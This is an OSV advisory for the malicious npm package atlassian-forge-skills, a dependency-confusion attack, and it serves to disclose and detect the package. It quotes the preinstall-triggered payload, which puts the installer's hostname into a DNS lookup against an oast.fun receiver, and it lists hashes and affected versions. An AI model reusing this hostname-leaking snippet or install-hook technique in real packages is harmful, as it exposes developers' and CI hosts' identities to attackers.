MAL-2026-5891

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/atlassian-forge-skills/MAL-2026-5891.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5891
Published
2026-06-16T14:52:14Z
Modified
2026-06-16T16:16:48.970172254Z
Summary
Malicious code in atlassian-forge-skills (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c)

Package impersonates an internal Atlassian Forge dependency (unscoped name atlassian-forge-skills, description 'Internal package', generic author 'Team'). package.json declares "preinstall": "node index.js", which fires automatically on npm install. index.js lines 6-8 read os.hostname() and embed it as a subdomain of a hardcoded interactsh OAST receiver: const targetDomain =${hostname}.zcagyqqmvnmgsklstrrr6xo2715tov7wz.oast.fun; dns.lookup(targetDomain, () => {});. The DNS lookup is sufficient to leak the installer's hostname to the attacker-controlled oast.fun DNS server — the canonical dependency-confusion payload, where any developer or CI pipeline that mistakenly resolves an internal Atlassian package name to this public registry entry exposes host identity for follow-on targeting.

Database specific 
{
    "malicious-packages-origins": [
        {
            "sha256": "0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T14:52:14Z",
            "versions": [
                "29.1.0"
            ],
            "id": "IN-MAL-2026-006753",
            "import_time": "2026-06-16T16:06:33.198581429Z"
        }
    ]
}
References
Credits

Affected packages

npm / atlassian-forge-skills

Package

Name
atlassian-forge-skills
View open source insights on deps.dev
Purl
pkg:npm/atlassian-forge-skills

Affected ranges

Affected versions

29.*
29.1.0

Database specific

cwes 
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/atlassian-forge-skills/MAL-2026-5891.json"
indicators 
{
    "evidence_files": [
        {
            "sha256": "022bbb08b9e9a7dc384de2d058f5cb1b053977a0abdc4db4fa518826c96b4b9b",
            "tlsh": "55d05ee503a4a390093162c872329617e723e1673683a9c0b94c92c24fa2a70cd728bc",
            "path": "index.js"
        },
        {
            "sha256": "b8f6e49458a479308513366d7578d3a234982ee618f23435d71a691979476fd9",
            "tlsh": "e8e02b728d219d2308744bf5483a290ab1928f3f60384c8bf1bb121c61d32608cee308",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-kppU1UOyFnUbOL9KPGgQoCvSGCh/xMQzhMoqjADJlKfyE3E7p71XTLlyoTAEomfghocgTLXoM0kefb6jK+5fyA==",
                "sha1": "34d9108eec5b1768df67557ccfb364006b84a051"
            },
            "filename": "atlassian-forge-skills-29.1.0.tgz"
        }
    ]
}